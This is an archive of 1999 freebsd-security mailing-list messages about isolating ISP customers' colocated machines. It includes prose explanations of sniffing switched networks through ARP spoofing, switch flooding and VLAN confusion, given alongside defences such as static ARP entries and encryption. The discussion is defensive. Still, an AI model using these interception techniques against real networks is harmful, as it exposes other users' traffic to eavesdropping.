[195.16.223.96]) by finland.ispro.net.tr (8.9.3/8.9.3) with ESMTP id VAA69385 for ; Fri, 20 Aug 1999 21:29:34 +0300 (EEST) (envelope-from yurtesen@ispro.net.tr) Message-ID: <37BD9E40.7B95E73E@ispro.net.tr> Date: Fri, 20 Aug 1999 21:28:16 +0300 From: Evren Yurtesen X-Mailer: Mozilla 4.51 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: multiple machines in the same network Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, We are an ISP and we want to let our customers to put their own hardware into our network. But the thing we are concerned about is security of course. How can we protect our system from customers' machines? I have heard about somehthing called "virtual network" but I am not sure of what it means and even if it is the thing I am searching for ? thanks! Evren Yurtesen yurtesen@ispro.net.tr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 11:51:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 144961524E for ; Fri, 20 Aug 1999 11:51:49 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA24136; Fri, 20 Aug 1999 11:37:00 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908201837.LAA24136@gndrsh.dnsmgr.net> Subject: Re: Securelevel 3 ant setting time In-Reply-To: from Will Andrews at "Aug 20, 1999 11:52:04 am" To: andrews@TECHNOLOGIST.COM (Will Andrews) Date: Fri, 20 Aug 1999 11:37:00 -0700 (PDT) Cc: brett@lariat.org (Brett Glass), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On 20-Aug-99 Brett Glass wrote: > > I looked at the man page for xntpd once, and walked away (well, > > VIRTUALLY walked away) scratching my head. It was totally opaque. > > There was no simple information about how to synchronize with the NIST > > every so often; also, it appeared that one needed to leave a large, > > expensive daemon running all the time. So, I went with ntpdate, which > > was simple and easy to understand (and which got out of the way after > > it adjusted the clock). The system with the worst clock drifts no more > > than 5 minutes every 12 hours -- and that, I suspect, is mainly due to > > busy-waits with interrupts off in the ATAPI driver. > > Simple xntpd: > > # echo "server time.nist.gov" > /etc/ntp.conf Please attempt to find a local lower stratum 2 or 3 clock closer to you network wise. Call your ISP and ask if they have xntpd running some place, >50% of them do. You'll get less jitter over a shorter set of network hops. It also reduces the very small load on the large stratum 1 clocks. Please read the xntpd FAQ. You should always check it for the closest public ntp server. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 11:55:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E633A15362 for ; Fri, 20 Aug 1999 11:55:13 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA24307; Fri, 20 Aug 1999 11:52:19 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908201852.LAA24307@gndrsh.dnsmgr.net> Subject: Re: multiple machines in the same network In-Reply-To: <37BD9E40.7B95E73E@ispro.net.tr> from Evren Yurtesen at "Aug 20, 1999 09:28:16 pm" To: yurtesen@ispro.net.tr (Evren Yurtesen) Date: Fri, 20 Aug 1999 11:52:18 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hello, > > We are an ISP and we want to let our customers to put their own hardware > into our network. But the thing we are concerned about is security of > course. How can we protect our system from customers' machines? I would strongly suggest that you place your customers on a ethernet switch. Any of the modern 10/100 switches work well for this. Each customer gets 1 port on the switch, if they have more than 1 machine they install thier own hub connected to the switch. This prevents them from sniffing other customers traffic. Then you need to setup a router between this switch and your DMZ with a firewall rule set that stops all the nasty stuff like RFC1918 nets, smurf amplifier (block the broadcast addresses to all known subnets), etc. > > I have heard about somehthing called "virtual network" but I am not sure > of what it means and even if it is the thing I am searching for ? You don't need VLAN's for this, it's overkill. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:31:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from web601.yahoomail.com (web1206.mail.yahoo.com [128.11.23.142]) by hub.freebsd.org (Postfix) with SMTP id 5F75814CA1 for ; Fri, 20 Aug 1999 12:31:54 -0700 (PDT) (envelope-from service_account@yahoo.com) Message-ID: <19990820192825.15974.rocketmail@web601.yahoomail.com> Received: from [15.255.160.64] by web1206.mail.yahoo.com; Fri, 20 Aug 1999 12:28:25 PDT Date: Fri, 20 Aug 1999 12:28:25 -0700 (PDT) From: jay d Subject: Re: multiple machines in the same network To: "Rodney W. Grimes" , Evren Yurtesen Cc: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What you really want is a VLAN capable switch. VLAN switches simply designate what ports on a switch can see what other ports on the same switch. I have to correct you though, Rodney, as sniffing is currently possible through switches. Jay --- "Rodney W. Grimes" wrote: > > Hello, > > > > We are an ISP and we want to let our customers to > put their own hardware > > into our network. But the thing we are concerned > about is security of > > course. How can we protect our system from > customers' machines? > > I would strongly suggest that you place your > customers on a ethernet > switch. Any of the modern 10/100 switches work well > for this. Each > customer gets 1 port on the switch, if they have > more than 1 machine > they install thier own hub connected to the switch. > This prevents > them from sniffing other customers traffic. Then > you need to setup > a router between this switch and your DMZ with a > firewall rule set > that stops all the nasty stuff like RFC1918 nets, > smurf amplifier (block > the broadcast addresses to all known subnets), etc. > > > > > I have heard about somehthing called "virtual > network" but I am not sure > > of what it means and even if it is the thing I am > searching for ? > > You don't need VLAN's for this, it's overkill. > > -- > Rod Grimes - KD7CAX - (RWG25) > rgrimes@gndrsh.dnsmgr.net > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:35:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [209.83.5.170]) by hub.freebsd.org (Postfix) with ESMTP id 1D91B15699 for ; Fri, 20 Aug 1999 12:35:14 -0700 (PDT) (envelope-from mustang@TeraHertz.Net) Received: from localhost (mustang@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id OAA93439; Fri, 20 Aug 1999 14:33:26 -0500 (CDT) Date: Fri, 20 Aug 1999 14:33:25 -0500 (CDT) From: Chris Malayter To: jay d Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820192825.15974.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Care to elaborate on that? I'm in a colocated facility with multiple boxes that I am sure our root comprimised, if in fact you can sniff on a switched network, I'de like to know how you protect yourself against that? Chris Malayter Mustang@TeraHertz.Net ------------------------------------------------------------------------- Administrator, TeraHertz Communications | | | InterNIC CM3647 | Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | ------------------------------------------------------------------------- "Behavior is hard to change...but character is nearly impossible" On Fri, 20 Aug 1999, jay d wrote: > What you really want is a VLAN capable switch. VLAN switches simply > designate what ports on a switch can see what other ports on the same > switch. I have to correct you though, Rodney, as sniffing is currently > possible through switches. > > Jay > > --- "Rodney W. Grimes" wrote: > > > Hello, > > > > > > We are an ISP and we want to let our customers to > > put their own hardware > > > into our network. But the thing we are concerned > > about is security of > > > course. How can we protect our system from > > customers' machines? > > > > I would strongly suggest that you place your > > customers on a ethernet > > switch. Any of the modern 10/100 switches work well > > for this. Each > > customer gets 1 port on the switch, if they have > > more than 1 machine > > they install thier own hub connected to the switch. > > This prevents > > them from sniffing other customers traffic. Then > > you need to setup > > a router between this switch and your DMZ with a > > firewall rule set > > that stops all the nasty stuff like RFC1918 nets, > > smurf amplifier (block > > the broadcast addresses to all known subnets), etc. > > > > > > > > I have heard about somehthing called "virtual > > network" but I am not sure > > > of what it means and even if it is the thing I am > > searching for ? > > > > You don't need VLAN's for this, it's overkill. > > > > -- > > Rod Grimes - KD7CAX - (RWG25) > > rgrimes@gndrsh.dnsmgr.net > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > > > > __________________________________________________ > Do You Yahoo!? > Bid and sell for free at http://auctions.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:42: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from web601.yahoomail.com (web1204.mail.yahoo.com [128.11.23.140]) by hub.freebsd.org (Postfix) with SMTP id C0CFF156C7 for ; Fri, 20 Aug 1999 12:41:58 -0700 (PDT) (envelope-from service_account@yahoo.com) Message-ID: <19990820194238.29331.rocketmail@web601.yahoomail.com> Received: from [15.255.160.64] by web1204.mail.yahoo.com; Fri, 20 Aug 1999 12:42:38 PDT Date: Fri, 20 Aug 1999 12:42:38 -0700 (PDT) From: jay d Subject: Re: multiple machines in the same network To: Chris Malayter Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org current project >:) i probably shouldn't have said that. jay --- Chris Malayter wrote: > Care to elaborate on that? I'm in a colocated > facility with multiple > boxes that I am sure our root comprimised, if in > fact you can sniff on a > switched network, I'de like to know how you protect > yourself against that? > > Chris Malayter > > > Mustang@TeraHertz.Net > > ------------------------------------------------------------------------- > Administrator, TeraHertz Communications | | > | InterNIC CM3647 | > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | > | > ------------------------------------------------------------------------- > > "Behavior is hard to change...but character is > nearly impossible" > > > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. > VLAN switches simply > > designate what ports on a switch can see what > other ports on the same > > switch. I have to correct you though, Rodney, as > sniffing is currently > > possible through switches. > > > > Jay > > > > --- "Rodney W. Grimes" > wrote: > > > > Hello, > > > > > > > > We are an ISP and we want to let our customers > to > > > put their own hardware > > > > into our network. But the thing we are > concerned > > > about is security of > > > > course. How can we protect our system from > > > customers' machines? > > > > > > I would strongly suggest that you place your > > > customers on a ethernet > > > switch. Any of the modern 10/100 switches work > well > > > for this. Each > > > customer gets 1 port on the switch, if they have > > > more than 1 machine > > > they install thier own hub connected to the > switch. > > > This prevents > > > them from sniffing other customers traffic. > Then > > > you need to setup > > > a router between this switch and your DMZ with a > > > firewall rule set > > > that stops all the nasty stuff like RFC1918 > nets, > > > smurf amplifier (block > > > the broadcast addresses to all known subnets), > etc. > > > > > > > > > > > I have heard about somehthing called "virtual > > > network" but I am not sure > > > > of what it means and even if it is the thing I > am > > > searching for ? > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > -- > > > Rod Grimes - KD7CAX - (RWG25) > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > To Unsubscribe: send mail to > majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body > of > > > the message > > > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:47:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [209.83.5.170]) by hub.freebsd.org (Postfix) with ESMTP id 74CBE15699 for ; Fri, 20 Aug 1999 12:47:30 -0700 (PDT) (envelope-from mustang@TeraHertz.Net) Received: from localhost (mustang@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id OAA94266; Fri, 20 Aug 1999 14:45:03 -0500 (CDT) Date: Fri, 20 Aug 1999 14:45:03 -0500 (CDT) From: Chris Malayter To: jay d Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820194238.29331.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Too late? :) Spill the scoop. Chris Malayter Mustang@TeraHertz.Net ------------------------------------------------------------------------- Administrator, TeraHertz Communications | | | InterNIC CM3647 | Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | ------------------------------------------------------------------------- "Behavior is hard to change...but character is nearly impossible" On Fri, 20 Aug 1999, jay d wrote: > current project >:) i probably shouldn't have said that. > > jay > > --- Chris Malayter wrote: > > Care to elaborate on that? I'm in a colocated > > facility with multiple > > boxes that I am sure our root comprimised, if in > > fact you can sniff on a > > switched network, I'de like to know how you protect > > yourself against that? > > > > Chris Malayter > > > > > > Mustang@TeraHertz.Net > > > > > ------------------------------------------------------------------------- > > Administrator, TeraHertz Communications | | > > | InterNIC CM3647 | > > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | > > | > > > ------------------------------------------------------------------------- > > > > "Behavior is hard to change...but character is > > nearly impossible" > > > > > > On Fri, 20 Aug 1999, jay d wrote: > > > > > What you really want is a VLAN capable switch. > > VLAN switches simply > > > designate what ports on a switch can see what > > other ports on the same > > > switch. I have to correct you though, Rodney, as > > sniffing is currently > > > possible through switches. > > > > > > Jay > > > > > > --- "Rodney W. Grimes" > > wrote: > > > > > Hello, > > > > > > > > > > We are an ISP and we want to let our customers > > to > > > > put their own hardware > > > > > into our network. But the thing we are > > concerned > > > > about is security of > > > > > course. How can we protect our system from > > > > customers' machines? > > > > > > > > I would strongly suggest that you place your > > > > customers on a ethernet > > > > switch. Any of the modern 10/100 switches work > > well > > > > for this. Each > > > > customer gets 1 port on the switch, if they have > > > > more than 1 machine > > > > they install thier own hub connected to the > > switch. > > > > This prevents > > > > them from sniffing other customers traffic. > > Then > > > > you need to setup > > > > a router between this switch and your DMZ with a > > > > firewall rule set > > > > that stops all the nasty stuff like RFC1918 > > nets, > > > > smurf amplifier (block > > > > the broadcast addresses to all known subnets), > > etc. > > > > > > > > > > > > > > I have heard about somehthing called "virtual > > > > network" but I am not sure > > > > > of what it means and even if it is the thing I > > am > > > > searching for ? > > > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > > > -- > > > > Rod Grimes - KD7CAX - (RWG25) > > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > > > > To Unsubscribe: send mail to > > majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body > > of > > > > the message > > > > > > > > > > > > > > __________________________________________________ > > > Do You Yahoo!? > > > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of > > the message > > > > > > > > > __________________________________________________ > Do You Yahoo!? > Bid and sell for free at http://auctions.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:49:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from shiva.eu.org (cx943344-a.fed1.sdca.home.com [24.0.167.187]) by hub.freebsd.org (Postfix) with ESMTP id A2C7B15699 for ; Fri, 20 Aug 1999 12:49:37 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Received: from localhost (bigby@localhost) by shiva.eu.org (8.9.3/8.9.3) with ESMTP id MAA24332; Fri, 20 Aug 1999 12:46:33 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Date: Fri, 20 Aug 1999 12:46:28 -0700 (PDT) From: Bigby Findrake To: jay d Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820192825.15974.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 20 Aug 1999, jay d wrote: > What you really want is a VLAN capable switch. VLAN switches simply > designate what ports on a switch can see what other ports on the same > switch. I have to correct you though, Rodney, as sniffing is currently > possible through switches. Please, do tell us how it's possible to sniff through switches. /-------------------------------------------------------------------------/ It's easier to obtain forgiveness than permission. finger bigby@shiva.eu.org for my pgpkey e-mail bigby@pager.shiva.eu.org to page me /-------------------------------------------------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:54: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from abatis.sweb.com (ip-140-066.gw.total-web.net [209.187.140.66]) by hub.freebsd.org (Postfix) with ESMTP id E457014C1E for ; Fri, 20 Aug 1999 12:53:58 -0700 (PDT) (envelope-from zaph0d@abatis.sweb.com) Received: from localhost (zaph0d@localhost) by abatis.sweb.com (8.9.3/8.9.3) with SMTP id PAA84500; Fri, 20 Aug 1999 15:51:58 -0400 (EDT) Date: Fri, 20 Aug 1999 15:51:58 -0400 (EDT) From: zaph0d To: Evren Yurtesen Cc: freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BD9E40.7B95E73E@ispro.net.tr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org segment the ethernet. k eep them on their own segment On Fri, 20 Aug 1999, Evren Yurtesen wrote: > Hello, > > We are an ISP and we want to let our customers to put their own hardware > into our network. But the thing we are concerned about is security of > course. How can we protect our system from customers' machines? > > I have heard about somehthing called "virtual network" but I am not sure > of what it means and even if it is the thing I am searching for ? > > thanks! > > Evren Yurtesen > yurtesen@ispro.net.tr > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13: 6:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix.updatesystems.com (troy-mesa.updatesystems.com [209.38.186.65]) by hub.freebsd.org (Postfix) with ESMTP id 5F64B15AC3 for ; Fri, 20 Aug 1999 13:06:34 -0700 (PDT) (envelope-from jmaslak@updatesystems.com) Received: from localhost (jmaslak@localhost) by unix.updatesystems.com (8.9.3/8.9.3) with ESMTP id OAA01854 for ; Fri, 20 Aug 1999 14:06:02 -0600 Date: Fri, 20 Aug 1999 14:06:02 -0600 (MDT) From: Joel Maslak To: freebsd-security@freebsd.org Subject: Switches & Security Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To compromize a network consisting of a switched backbone... Let's say there are two machines, A and B. Let's say there is a router, R. So: Internet ---- R ----+ | A -- SWITCH -- B Let's say B got compromised. What B has to do is send ARP broadcasts out, claiming that it is actually R. Now, it knows R's REAL ethernet address. If R is busy and doesn't notice this (can be done a lot of ways), A may change it's ARP table. If R notices, it may log this problem, or even stop working. Thus, to send packets to the Internet, A ends up sending them to B's ethernet address (B thinks that is the ethernet address of R). B resends them (after logging them) to R's real ethernet address. --- That was method 1. --- There are MANY ways to invalidate the ARP cache of a switch. Some crash the switch. VLANs do *NOT* always protect you, either! VLANs, technically, are just broadcast domain seperations and nothing more. Some switches prevent any packet from crossing VLAN boundaries. A lot of others, though, just prevent broadcast packets from crossing those boundaries. Thus, two machines can communicate through the VLAN boundary if they know each other's ethernet address. Sending out forged packets with the source ethernet address of another VLAN is a sure way to confuse most switches, BTW. Joel Maslak UPDATE Systems Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:15:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id BBF6D14C12 for ; Fri, 20 Aug 1999 13:15:20 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug ([198.82.107.38]) by tasam.com (8.9.3/8.9.3) with SMTP id QAA79876; Fri, 20 Aug 1999 16:14:42 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com) Message-ID: <000b01beeb48$84609f50$0286860a@tasam.com> From: "Joe Gleason" To: "Joel Maslak" , References: Subject: Re: Switches & Security Date: Fri, 20 Aug 1999 16:13:02 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One solution for method 1 is to use static arp assingments in the router, and in both boxes. > > To compromize a network consisting of a switched backbone... > > Let's say there are two machines, A and B. Let's say there is a router, > R. > > So: > > Internet ---- R ----+ > | > A -- SWITCH -- B > > Let's say B got compromised. > > What B has to do is send ARP broadcasts out, claiming that it is actually > R. Now, it knows R's REAL ethernet address. > > If R is busy and doesn't notice this (can be done a lot of ways), A may > change it's ARP table. If R notices, it may log this problem, or even > stop working. > > Thus, to send packets to the Internet, A ends up sending them to B's > ethernet address (B thinks that is the ethernet address of R). B resends > them (after logging them) to R's real ethernet address. > > --- That was method 1. --- > > There are MANY ways to invalidate the ARP cache of a switch. Some > crash the switch. > > VLANs do *NOT* always protect you, either! VLANs, technically, are just > broadcast domain seperations and nothing more. Some switches prevent any > packet from crossing VLAN boundaries. A lot of others, though, just > prevent broadcast packets from crossing those boundaries. Thus, two > machines can communicate through the VLAN boundary if they know each > other's ethernet address. > > Sending out forged packets with the source ethernet address of another > VLAN is a sure way to confuse most switches, BTW. > > > Joel Maslak > UPDATE Systems Inc. > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:19:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 8078E14EE7 for ; Fri, 20 Aug 1999 13:19:25 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3/8.9.3) id NAA20101; Fri, 20 Aug 1999 13:37:00 -0700 (PDT) Date: Fri, 20 Aug 1999 13:36:59 -0700 From: Andre Gironda To: Joel Maslak Cc: freebsd-security@freebsd.org Subject: Re: Switches & Security Message-ID: <19990820133659.B19220@toaster.sun4c.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Joel Maslak on Fri, Aug 20, 1999 at 02:06:02PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org you can't rely on switches for security. this is fairly well-known. i've yet to see much analysis or documentation on this, however. here are a few links for the curious: http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-10-08&thread=Pine.OSF.4.03.9810122112070.6019-100000@gcinfo.gc.maricopa.edu most of the attacks known have to do with either filling up forwarding tables or "leakage" of traffic. there are other, more dangerous attacks that involve the actual protocols themselves (via ieee 802). not to mention attacks on ipv4, arp, icmp, etc. traffic can be SNIFFED. encrypt and authenticate all your traffic if you want it to be safe. researching vpn's and ipsec is step one. dre On Fri, Aug 20, 1999 at 02:06:02PM -0600, Joel Maslak wrote: > > To compromize a network consisting of a switched backbone... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:37:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 0E3DB14BF3 for ; Fri, 20 Aug 1999 13:37:39 -0700 (PDT) (envelope-from cliff@steam.com) Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id NAA08614; Fri, 20 Aug 1999 13:34:05 -0700 (PDT) Date: Fri, 20 Aug 1999 13:34:05 -0700 (PDT) From: Cliff Skolnick X-Sender: cliff@lazlo.internal.steam.com To: Bigby Findrake Cc: jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hacked arp code on one machine could return a broadcast or multicast ethernet address to an arp query for any machine. The switch would then treat all traffic as broadcast sending it to every port. Since the machines TCP/IP layer would receive the packet it woudl still be on the network, of course it would be receiving and dropping a bit more. Performance may be effected. :) You really want the machines on a seperate segment and to be routed instead of switched. Cliff On Fri, 20 Aug 1999, Bigby Findrake wrote: > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. VLAN switches simply > > designate what ports on a switch can see what other ports on the same > > switch. I have to correct you though, Rodney, as sniffing is currently > > possible through switches. > > Please, do tell us how it's possible to sniff through switches. > > > /-------------------------------------------------------------------------/ > It's easier to obtain forgiveness than permission. > > finger bigby@shiva.eu.org for my pgpkey > e-mail bigby@pager.shiva.eu.org to page me > /-------------------------------------------------------------------------/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- | Cliff Skolnick | "They that can give up essential liberty to | | Steam Tunnel Operations | obtain a little temporary safety deserve | | cliff@steam.com | neither liberty nor safety." | | http://www.steam.com/ | -- Benjamin Franklin, 1759 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:41:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from web601.yahoomail.com (web1204.mail.yahoo.com [128.11.23.140]) by hub.freebsd.org (Postfix) with SMTP id AC14414D5F for ; Fri, 20 Aug 1999 13:41:47 -0700 (PDT) (envelope-from service_account@yahoo.com) Message-ID: <19990820203932.9282.rocketmail@web601.yahoomail.com> Received: from [15.255.160.64] by web1204.mail.yahoo.com; Fri, 20 Aug 1999 13:39:32 PDT Date: Fri, 20 Aug 1999 13:39:32 -0700 (PDT) From: jay d Subject: Re: multiple machines in the same network To: Cliff Skolnick , Bigby Findrake Cc: jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ding ding ding! we have a winner :) that's pretty much it, my friend. jay --- Cliff Skolnick wrote: > > Hacked arp code on one machine could return a > broadcast or multicast > ethernet address to an arp query for any machine. > The switch would then > treat all traffic as broadcast sending it to every > port. Since the machines > TCP/IP layer would receive the packet it woudl still > be on the network, of > course it would be receiving and dropping a bit > more. Performance may be > effected. :) > > You really want the machines on a seperate segment > and to be routed instead > of switched. > > Cliff > > On Fri, 20 Aug 1999, Bigby Findrake wrote: > > > On Fri, 20 Aug 1999, jay d wrote: > > > > > What you really want is a VLAN capable switch. > VLAN switches simply > > > designate what ports on a switch can see what > other ports on the same > > > switch. I have to correct you though, Rodney, as > sniffing is currently > > > possible through switches. > > > > Please, do tell us how it's possible to sniff > through switches. > > > > > > > /-------------------------------------------------------------------------/ > > It's easier to obtain forgiveness than permission. > > > > finger bigby@shiva.eu.org for my pgpkey > > e-mail bigby@pager.shiva.eu.org to page me > > > /-------------------------------------------------------------------------/ > > > > > > > > To 